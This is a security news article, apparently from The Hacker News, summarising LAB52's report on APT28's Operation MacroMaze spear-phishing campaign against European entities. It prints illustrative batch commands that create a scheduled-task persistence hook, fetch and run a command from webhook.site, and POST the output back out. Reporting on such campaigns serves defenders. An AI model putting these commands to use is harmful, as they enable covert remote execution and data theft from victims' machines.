APT28 Targeted European Entities Using Webhook-Based Macro Malware

Source: The Hacker News

The Russia‑linked state‑sponsored threat actor tracked as APT28 has been attributed to a new campaign targeting specific entities in Western and Central Europe.

The activity, observed by S2 Grupo’s LAB52 threat‑intelligence team between September 2025 and January 2026, is codenamed Operation MacroMaze. According to LAB52, “the campaign relies on basic tooling and the exploitation of legitimate services for infrastructure and data exfiltration.”

Operation MacroMaze Overview

• Delivery vector: Spear‑phishing emails with malicious Microsoft Office documents.
• Core technique: Documents embed an XML field named INCLUDEPICTURE that points to a webhook.site URL hosting a JPG image. Opening the document triggers a request to that URL, acting as a tracking‑pixel beacon.
• Purpose of the beacon: Allows the attacker to confirm that the document was opened and to begin the next stage of the infection.

Technical Details

Spear‑phishing Delivery

The malicious documents are crafted to look legitimate while containing the INCLUDEPICTURE element that references a remote image. When the document is opened, Microsoft Office automatically fetches the image, generating an outbound HTTP request to the attacker‑controlled webhook.site endpoint.

Macro Droppers

LAB52 identified multiple documents with slightly varied macros (late September 2025 – January 2026). All macros share the same overall logic but show an evolution in evasion techniques:

• Older versions: Execute a “headless” browser instance to avoid UI prompts.
• Newer versions: Use keyboard simulation (SendKeys) to bypass security dialogs.

The macro launches a Visual Basic Script (VBScript) that:

1. Executes a CMD file to create a scheduled‑task persistence mechanism.
2. Starts a batch script that renders a small Base64‑encoded HTML payload in Microsoft Edge (headless mode).
3. Retrieves a command from the webhook.site endpoint, executes it, captures the output, and exfiltrates the data to a second webhook.site URL as an HTML file.

A second batch‑script variant avoids headless execution; instead, it moves the Edge window off‑screen and terminates any other Edge processes to maintain a controlled environment.

Command Execution and Persistence

The persistence chain relies on standard Windows tools:

schtasks /create /tn "UpdateTask" /tr "C:\Path\to\malicious.bat" /sc onlogon

The batch script then:

rem Render Base64‑encoded HTML in Edge (headless)
start msedge --headless --disable-gpu "data:text/html;base64,{{payload}}"

rem Retrieve command from webhook.site
curl -s https://webhook.site/xxxxxx/command > cmd.txt
call cmd.txt > output.txt

rem Exfiltrate output
curl -X POST -F "file=@output.txt" https://webhook.site/xxxxxx/exfil

Browser‑Based Exfiltration

When the rendered HTML file is displayed in Microsoft Edge, it automatically submits a form, sending the captured command output to the attacker’s webhook.site endpoint without any user interaction. This technique leverages standard HTML form submission, minimizing on‑disk artifacts and evading many endpoint‑detection solutions.

Conclusion

Operation MacroMaze demonstrates that simplicity can be powerful. APT28 strings together basic tools—batch files, tiny VBS launchers, and simple HTML—to achieve a stealthy, multi‑stage attack:

• Delivery: Spear‑phishing with beaconing documents.
• Persistence: Scheduled tasks created via native Windows utilities.
• Execution: Headless or off‑screen browser sessions to run commands.
• Exfiltration: Standard HTML form submissions to widely used webhook.site services.

By outsourcing both payload delivery and data exfiltration to legitimate, high‑trust services, the campaign reduces its own footprint and complicates detection.